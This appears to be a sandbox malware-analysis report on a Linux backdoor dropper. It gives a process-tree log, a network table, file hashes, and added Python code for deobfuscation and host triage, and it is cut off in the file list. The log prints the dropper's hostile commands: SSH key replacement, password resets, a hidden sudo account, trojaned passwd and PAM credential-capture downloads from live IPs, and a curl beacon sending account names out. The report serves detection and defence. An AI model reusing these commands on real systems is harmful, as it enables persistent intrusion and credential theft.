[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c -- test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke -m u]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart -m u]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.12

[/usr/bin/python3.12 -]

/bin/sh

[sh -c -- if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.Kvgac8gTFX /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.Kvgac8gTFX]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/tr

[tr \n ]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/xrx/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

/usr/bin/chmod

[chmod 4755 /bin/passwd]

/usr/bin/chmod

[chmod u+s /bin/passwd]

/usr/bin/cp

[cp /bin/passwd /usr/bin/passwd]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/pam_tms]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/pam_tms]

/usr/bin/chmod

[chmod +x /sbin/pam_tms]

/usr/bin/grep

[grep -q pam_tms /etc/pam.d/common-auth]

/usr/sbin/useradd

[useradd cheeki]

/usr/sbin/usermod

[usermod -aG sudo cheeki]

/usr/sbin/usermod

[usermod -aG wheel cheeki]

/usr/sbin/usermod

[usermod -p $6$vrC8Hya.mmeUeIem$Li01KI3RQUpyYepjXUhHF23fTle/wXqAoR0xUFo697faBvmsuXJBTMMK89vGf1YHzhztRGGsNbA/eTIIRXy5Y/ cheeki]

/usr/bin/mv

[mv /var/tmp/.xrx/key /home/cheeki/.ssh/authorized_keys]

/usr/bin/mkdir

[mkdir /var/tmp/.x]

/usr/bin/mv

[mv /var/tmp/.xrx/secure /var/tmp/.x/secure]

/usr/bin/chmod

[chmod +x /var/tmp/.x/secure]

/var/tmp/.x/secure

[/var/tmp/.x/secure]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/tr

[tr \n ]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://179.43.154.189:1010/users?userlist=cm9vdCB1c2VyIGNoZWVraSA=]
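The `/tmp/xrx/init0 -c` command line near the top of this process tree is the whole dropper: a few hundred short string fragments (`z=" ";xFz='Vwn';...`) followed by `eval` of their concatenation, and every command line that follows it (the `chattr` calls on `authorized_keys`, the `usermod -p` hashes, the `passwd` and `pam_tms` downloads from 185.252.178.82:6972, the `users?userlist=` beacon) is a statement of that decoded script. A script built this way can be recovered without running it by parsing the assignments with bash quoting rules and expanding the quoted variable chain handed to `eval`. The parser below is an added example written for this report, not code from the sample or from the sandbox; `SAMPLE` is a constructed miniature in the same style rather than the report's blob, and rendering the `z` fragment as a line break is an assumption made for readability (the report shows `z` as a single space, but every statement in the dropper's chain is joined through it).

```python
"""Recover a fragment-concatenation bash dropper without executing it.

Added example, not code from the sample or the sandbox. It parses the
`name='...';` assignments with bash quoting rules and expands the quoted
variable chain given to eval. SAMPLE is a constructed miniature in the same
style as the init0 command line, not the blob from the report.
"""
import re

_ASSIGN = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)=")
_EVAL = re.compile(r'\beval\s+"((?:\$[A-Za-z_][A-Za-z0-9_]*)+)"')
_VAR = re.compile(r"\$([A-Za-z_][A-Za-z0-9_]*)")

# Constructed sample: decodes to two statements joined through z, using the
# same close-quote / escaped-quote / reopen-quote idiom the real dropper uses.
SAMPLE = r"""#!/bin/bash z=" ";Az='cha';Bz='ttr';Cz=' +i';Dz='a /';Ez='roo';Fz='t/.';Gz='ssh';Hz='/au';Iz='tho';Jz='riz';Kz='ed_';Lz='key';Mz='s';Nz='ech';Oz='o '\''';Pz='don';Qz='e'\'''; eval "$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz"
"""


def read_word(s, i):
    """Read one bash word starting at s[i]; return (value, index after it).

    Single-quoted runs are literal, so the dropper's quote-escape idiom is
    three adjacent pieces: a quoted run, a backslash-escaped quote, an empty
    quoted run. Inside double quotes a backslash escapes only the characters
    double-quote, backslash, dollar and backtick; outside quotes it escapes
    whatever follows it.
    """
    out = []
    while i < len(s) and s[i] not in ";\n \t":
        c = s[i]
        if c == "'":
            j = s.index("'", i + 1)
            out.append(s[i + 1:j])
            i = j + 1
        elif c == '"':
            i += 1
            while s[i] != '"':
                if s[i] == "\\" and s[i + 1] in '"\\$`':
                    i += 1
                out.append(s[i])
                i += 1
            i += 1
        elif c == "\\":
            out.append(s[i + 1])
            i += 2
        else:
            out.append(c)
            i += 1
    return "".join(out), i


def parse_assignments(script):
    """Collect the leading name=value assignments, stopping at the first
    token that is not one (in the dropper that token is `eval`)."""
    i = script.find(" ") + 1 if script.startswith("#!") else 0
    values = {}
    while True:
        while i < len(script) and script[i] in "; \t\n":
            i += 1
        m = _ASSIGN.match(script, i)
        if not m:
            return values, i
        values[m.group(1)], i = read_word(script, m.end())


def deobfuscate(script, newline_var=None):
    """Return the string eval would have executed. `newline_var` names the
    fragment to render as a newline (the dropper's statement separator z);
    that rendering is this example's readability assumption."""
    values, _ = parse_assignments(script)
    m = _EVAL.search(script)
    if not m:
        raise ValueError("no eval of a quoted variable chain found")
    return "".join("\n" if name == newline_var else values[name]
                   for name in _VAR.findall(m.group(1)))
```

To apply it to the real blob, save the text of the `-c` argument (from `#!/bin/bash` through the closing quote of the `eval` string) to a file and call `deobfuscate(open(path).read(), newline_var="z")`; the output reads one statement per line and can be checked against the command lines listed above.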

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
SE 194.71.11.163:80 se.archive.ubuntu.com tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
CH 179.43.154.189:1010 tcp
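Read together, the process tree and the network table give a compact indicator set for this dropper: the `/tmp/xrx`, `/var/tmp/.xrx` and `/var/tmp/.x` directories, `/usr/lib/updated`, the `cheeki` account added to `sudo` and `wheel`, `/sbin/pam_tms` referenced from `/etc/pam.d/common-auth` (the decoded script appends `auth optional pam_exec.so quiet expose_authtok /sbin/pam_tms`, which hands every password typed at login to that binary), the original `passwd` binaries left behind as `passwd.orig`, an emptied `/etc/crontab`, `authorized_keys` files made immutable with `chattr +ia`, and the beacon to 179.43.154.189:1010 whose `userlist` parameter is the base64 of the shell-capable account names (`cm9vdCB1c2VyIGNoZWVraSA=` decodes to `root user cheeki `). Note that several signatures above are side effects of the `apt-get install -y msr-tools` the script performs rather than behaviour of the dropper itself: needrestart, run from apt's hook, is what reads `/proc/*/maps` and calls `systemd-detect-virt`, and dpkg writing `rdmsr.dpkg-new` and `wrmsr.dpkg-new` is that package being unpacked. The triage below is an added example written for this report, not code from the sample or the sandbox; the indicator values come from the tables above, while the function names and the demo fixture (two constructed fake filesystem roots) are this example's own.

```python
"""Host and network triage for the artifacts this report ties to init0.

Added example, not part of the sandbox report or the sample. Drop paths, the
account name, the PAM module name, the remote addresses and the beacon format
come from the process tree and network table; everything else is constructed.
"""
import base64
import os
import shutil
import subprocess
import tempfile
from urllib.parse import parse_qs, urlsplit

# Paths the script creates, renames or drops, relative to the filesystem root.
DROP_PATHS = ("tmp/xrx", "var/tmp/.xrx", "var/tmp/.x", "usr/lib/updated",
              "sbin/pam_tms", "bin/passwd.orig", "usr/bin/passwd.orig")
BACKDOOR_USER = "cheeki"
PAM_MODULE = "pam_tms"
C2_HOSTS = {"185.252.178.82", "179.43.154.189"}


def is_immutable(path):
    """True if lsattr shows the 'i' flag, None if that cannot be determined."""
    if shutil.which("lsattr") is None or not os.path.isfile(path):
        return None
    r = subprocess.run(["lsattr", "-d", path], capture_output=True, text=True)
    fields = r.stdout.split()
    return ("i" in fields[0]) if r.returncode == 0 and fields else None


def triage(root="/"):
    """Return findings for the filesystem rooted at `root` ("/" on a live host)."""
    p = lambda rel: os.path.join(root, rel)
    findings = []
    for rel in DROP_PATHS:
        if os.path.lexists(p(rel)):
            findings.append(f"artifact present: /{rel}")
    # useradd cheeki; usermod -aG sudo/wheel cheeki
    if os.path.isfile(p("etc/passwd")):
        with open(p("etc/passwd")) as f:
            if any(line.split(":", 1)[0] == BACKDOOR_USER for line in f):
                findings.append(f"backdoor account present: {BACKDOOR_USER}")
    # pam_exec with expose_authtok feeds each typed password to /sbin/pam_tms.
    if os.path.isfile(p("etc/pam.d/common-auth")):
        with open(p("etc/pam.d/common-auth")) as f:
            for line in f:
                if PAM_MODULE in line or ("pam_exec" in line and "expose_authtok" in line):
                    findings.append(f"credential-capturing PAM line: {line.strip()}")
    # rm -rf /etc/crontab; touch /etc/crontab leaves an empty file behind.
    if os.path.isfile(p("etc/crontab")) and os.path.getsize(p("etc/crontab")) == 0:
        findings.append("/etc/crontab is empty (wiped)")
    # chattr +ia on authorized_keys blocks key revocation; flag every immutable one.
    homes = [p("root")]
    if os.path.isdir(p("home")):
        homes += [os.path.join(p("home"), d) for d in os.listdir(p("home"))]
    for h in homes:
        ak = os.path.join(h, ".ssh", "authorized_keys")
        if is_immutable(ak):
            findings.append(f"immutable authorized_keys: {ak}")
    return findings


def decode_beacon(url):
    """Decode the userlist beacon seen at the end of the process tree."""
    u = urlsplit(url)
    values = parse_qs(u.query).get("userlist")
    if u.hostname not in C2_HOSTS or not values:
        return None
    try:
        return u.hostname, base64.b64decode(values[0], validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)


def run_demo():
    """Triage two constructed fake roots: one carrying the artifacts, one clean."""
    results = {}
    for name in ("infected", "clean"):
        bad = name == "infected"
        root = tempfile.mkdtemp()
        _write(os.path.join(root, "etc/passwd"), "root:x:0:0:root:/root:/bin/bash\n"
               + ("cheeki:x:1001:1001::/home/cheeki:/bin/sh\n" if bad else ""))
        _write(os.path.join(root, "etc/pam.d/common-auth"), "auth required pam_unix.so\n"
               + ("auth optional pam_exec.so quiet expose_authtok /sbin/pam_tms\n" if bad else ""))
        _write(os.path.join(root, "etc/crontab"), "" if bad else "SHELL=/bin/sh\n")
        if bad:
            os.makedirs(os.path.join(root, "var/tmp/.x"))
            _write(os.path.join(root, "bin/passwd.orig"), "")
        results[name] = triage(root)
        shutil.rmtree(root)
    return results
```

On a live host, `triage("/")` needs root to read `/etc/pam.d` and the `.ssh` directories of other users; `is_immutable` returns `None` rather than a verdict where `lsattr` is missing or the filesystem does not carry attributes, so a `None` there is "unknown", not "clean". The `.passwd.orig` check is the cheap signal for the replaced `passwd`; `dpkg --verify passwd` is the authoritative one and is left to the operator because it only makes sense against the real root.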

Files

/var/cache/apt/archives/partial/msr-tools_1.3-5build1_amd64.deb

MD5 41d685bb374b8b9765cc8ad68c6ddd7c
SHA1 4d7f9893b486db574f737fd82f89f1db05d44e4e
SHA256 aa668bd5e23e3f703518eec2e52fffd6275c897ba84ef8a34ef646ac4dde32f4
SHA512 b9d5800641b0fb294d1688faf9dbd0a461a6347f405ab106dc6e2c71a0667c9a39eeb95904a218e5af57683a4f1882876f4ab538aecde442f68265c7467127a0

/var/log/apt/eipp.log.xz

MD5 cc6206f59ec7a64c75f24e79d19c69f7
SHA1 9e5ede07f6b85a9105aa234fa3e78898c3997fb2
SHA256 a961625a91f21ebeed9d5b96cd4063dd72a067d1c41884809f5590573471fad5
SHA512 ce257843f03d72692c7890df5f59943263144314f5fd817bff690458ec26096bb3dec1bd87beb8310580e86618f28282bb1b26366f832ab2eb5ccd8f8ff12c2f

/var/lib/dpkg/updates/tmp.i

MD5 0c83c7b81780508a33c1ea43e49bd0ab
SHA1 1bd385df4de89b74a9e0eaeb42078a3aa13e7a56
SHA256 9c1311fe3442b3427006b95fafa9e55261702b36fbc90b3300e9aca091498dd1
SHA512 97328bd96c405168e5226780a4664f1a6c4406c7b3ec66899d898053346c3e070e7c7cf7e2b659a1781fe5822ec9a6440beb2047e98994977e576562f5d33747

/var/lib/dpkg/tmp.ci/control

MD5 1e0f0dfa728ed7715510e29d0c820cfa
SHA1 9e20884889df0752af14f0afcc0a6bbdb5470c62
SHA256 7263b977924b9c59af6a5ad7da21e3f85d24beb3c4f0d6515ff1eb06fc11af4a
SHA512 41afc8ea626977e98101a9cf492c0d9736f32cc4bb2d0496d2a46769807a01f5282ba00c07141956eea7c364c7b5ce8966b2a891b7dd77d3fdab84b4ccd1f2b2

/var/lib/dpkg/tmp.ci/md5sums

MD5 f0183116fb005f86b0d573c6473fae9b
SHA1 6672eb52c0cb916df1c6924ace41b81264ef0b8b
SHA256 b08ea9d4bf7879ee69d29795219f6958979932f80976133636eecf5d8e9f1272
SHA512 314038597f986c2e1816b865e085014905b92e94d73f08b11a0b560362edb48a335a708617ae310375619752514475c93e48f6a4461e7675206cb5ec884f3a81

/var/lib/dpkg/updates/tmp.i

MD5 6e67dede930df3bc51a5d372940d8c75
SHA1 03a54c296eb9f17c41ea1142f7f2c2c70d715e20
SHA256 087c445cd41888ce3da908be88a19b2bec608e999d92cf006a2aaaebf9452bde
SHA512 28867ada88b421d70616002150c5e91bbd402907365932f9b1a47e3a36233a4f16791e457ff7e1a59eaced3c4bf16626675b6d6e282a50fd9b94397b1126077b

/var/lib/dpkg/updates/tmp.i

MD5 34eb56f174133f283fdc94da47b268f3
SHA1 c68b6ee72b7027222df4bed6b2fba79a3c56b670
SHA256 ad6b382be033c06573cc513c010fe8b7f6be7d43194923bf5e488ed093b8fd83
SHA512 f5195388268211b15e3c27583138d541ec581cb8e3ccea4c26f40cace1a06826cf2997603bddac110e935f84453ca33af08c048d7be76951d9543f41ede2574d

/var/lib/dpkg/updates/tmp.i

MD5 05ffb6efd8d30243a913f95453c376ab
SHA1 d3b05c42a5c9db40d2f375f40764cc2c81e14fcc
SHA256 78b6c50455d3659bb7effbb14312d8eeea86c3a248d0a497e43cf4d6d7ea0be3
SHA512 4c008f42d41d0b150c70593bc9d30152b3738f3341a73d4d3ec1ec8c3e4194b0a633efc1a8570fbdbd29032c323686a58d8d2fc9c922e49d3c399db0c5e9f98b

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/status-new

MD5 fda2311561ddfd0654505fa2cf369d91
SHA1 2a1be09d3084d3e2ff26e6048f4176af376b1a76
SHA256 0675b27fe2f05cf66d498e5ec5bb6f975aed807cf55440c03bb50a6800435500
SHA512 bef483a282d05f4bee4d3f0c353588cf03e1e7db8fcb9149c1c769a30bf1d247fd74c77485fa630317eff8c4dc6dc114319fdd7526e527e6f755ddb3e1e71e4c

/var/cache/man/4104

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/lib/dpkg/status-new

MD5 fc66f74346fb6e7b8d5593e437ceb6f3
SHA1 f35dc1b6a2457ea70067c1a5e48c10ba22fce953
SHA256 e26fb022c7efc9ae568e73e8b1f2034680d977bc2af726d50ce79a69ee0ad3a9
SHA512 68949144614c196d0d1bb9a94be6aa95670080115bcdb1253d1e66fdfd8244dbeda32c6dda2c8850275fc9382da452df58aafae1c2d5f8bbb0803ce1e7d3c425

/var/lib/update-notifier/tmp.Kvgac8gTFX

MD5 9e4474dd78060139ab355ed18427f88e
SHA1 e4608e740783b34ab9917ce0a4f379a9c760e725
SHA256 6e285b096a5771d3f0f75b00ea3ce4df1fa1648b6f6ba2311bd8eb5e0c90c708
SHA512 777cad103870948f8109488fe8c02a2ef616aca87319c446d305bb6ddcc01093266bcf78d1e76871937bde94e175a72b574985b33f693e7e0e542b9ed9f87706

/etc/passwd+

MD5 cea58ef2a54a8678646f9398f140d2de
SHA1 46ab8bcd243efa9c87b3859cd342f683f168e133
SHA256 ec0d3574508143d89a5ca35fcc9fe9ae0b0a1a6b0d89f47cbe17ac1d9d88072a
SHA512 9d6879919c7aeb654b27bd67292ebd5e5799cf184d5b45e4debb2d2d8666aebd1e078bfaed7cdb360d0e79a69f01aae009ff5867bf1688389e373de422177d74

/etc/shadow+

MD5 d7f0864275277cd007532a69de0bb969
SHA1 3eba640a166a326b34d0175c51edd6eba33f9460
SHA256 e563dcb02ff3f853d10b7859b126d1705f2e27df89556662a2931a18b8d3bafd
SHA512 e8a0f76dcc12c5e4147832774e6e7c0cda09f231057cb0e80233c7927146a7ba0ff0b18363c6e50a57059235d4384348486377ad53776cf7c7f5b6b0a4ef76f6

/etc/shadow+

MD5 58b187fc10137fd5ca7a8b4a724300ee
SHA1 5394e98da4b5a2aef6fc4e05f40e0203a4805439
SHA256 c4c5fe11e6ad6a9f24716c33e561763192c9c8b1c7fa81494898529d6e4f4855
SHA512 b41dc0d6e8732f7a24eea077331d22c3875168ca20f2243569a2893be7cca5061537a2484f1097f4cc148cd9e8b03004513714b970ccc92e8f5c401e743009ac

/etc/passwd+

MD5 1a2923599c03f2da0e70bc13fc7d2fcb
SHA1 7c850050beffefcd03cee16c3f74cbe63c7f9680
SHA256 bbe8f1dd9974aba408b38e18b0628341bbec08f2493973ff9b6446fa03701823
SHA512 5d8f456ad7bd9a9e4bbf677b03665ee22f1ed9479ea1fbceb004e97dbcdd9a84248c32e017b786fede7baf037c2249078e2e24bc38215d8d4f099f773494fa80

/etc/shadow+

MD5 cebff192afb08821d19a25039edc6af3
SHA1 da79d671c4d01bf02e22ce0b06c4567e1326d367
SHA256 459b3d9ebe3dc0123f0f90f99cb72485f24944f1011aaa5669686e5eb1312e3f
SHA512 6f942dab13165ddb94587c5e3887e6e77dee598fbd7159bad31690d62766c239493d93bab6fcea29f0c6c56ae81029b4f7cd5bdead79225b2ed244a1b35e9a5f

/etc/group+

MD5 b43bcab2b519b1f1d699ab5c9dc418eb
SHA1 e983ed6f5c31b3706b9d3eaf5efdcfe932d653bc
SHA256 4f94732b04d039e70819b986801ab8bb50cc056284e4b4536d46beca0f546f43
SHA512 87999a80f6d7eee4761fd0bb4948235a3133354916ee9ccb8c30eef97a895245959c3bbc7574afbea2f5071194743c15526a7d627d6e2e3edd6ff31a3bf059e9

/etc/gshadow+

MD5 9452ee212552c9f49ebca01b6291a740
SHA1 85e33b01e1d041ad6809067ed50b1770c9be478f
SHA256 363cd5c14472d9750701c768b7657d191e8e76b899b83aca2366ec6c82481669
SHA512 0427539b0dc8fd4c62a0389062a9868615f8cdd21ef4f248dc84ce999f647936b95492377e8655ad903addda37f4c8edea09a1ffdd2e7c014825e62fbfd68f7a

/etc/subuid+

MD5 4641942396624780f617210b1c564db9
SHA1 5f87f6066aed9fdc0cc1a907a397ba383731ac57
SHA256 6ed2c35ec029779fb7f08108345965c99c171908cd125934943dfc6c9a17d32e
SHA512 dccd0d158d875f145746c5efa7b1e87f458d4f1d1b91391958cb6e669ad2f8060c49bef46d79af62b521b02c4d10e8e4e50b4245bed539284eed580b3e3d23ca

/etc/group+

MD5 84eb5d846ee7bfef527db974a5feb1b2
SHA1 e811387fb348ab546f82d60d66a0c9a9c9735d36
SHA256 c11f30bbdc83688d1329289c0f5324e9aa0b0b81365eb6375b953103a2c43456
SHA512 f1fbc838ce695cb448038b8732fb054fd6f5502b6203377eb339e5bcbb8eb877c4f8c10ba5c30591eab82de3603c0a228243dfda7611eff3ae14d9813d69a25b

/etc/gshadow+

MD5 5c0e7d545ff1cfa0ba68f27349507a87
SHA1 0aa5fc2c5a8e1be03ce1bf2b4e68b82de1eb8d47
